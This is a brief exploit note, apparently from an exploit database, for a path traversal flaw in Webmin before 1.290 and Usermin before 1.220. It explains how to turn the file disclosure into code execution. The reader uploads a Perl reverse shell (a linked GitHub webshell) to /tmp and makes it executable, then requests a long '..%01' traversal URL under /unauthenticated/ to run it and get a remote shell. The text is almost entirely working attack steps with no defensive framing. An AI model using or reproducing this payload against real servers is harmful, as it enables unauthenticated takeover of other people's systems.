Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
Actually it's not just a local file disclosure vulnerability, It's a LFI-like vulnerability. We can get a shell if we can upload a file.
Upload a Perl reverse shell to /tmp/Reverse.cgi, and add execute privilege:
https://github.com/xiaoxiaoleo/xiao-webshell/blob/master/perl/Reverse.pl
Then access in web broswer:
http://<target>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/Reverse.cgi
Get the reverse shell.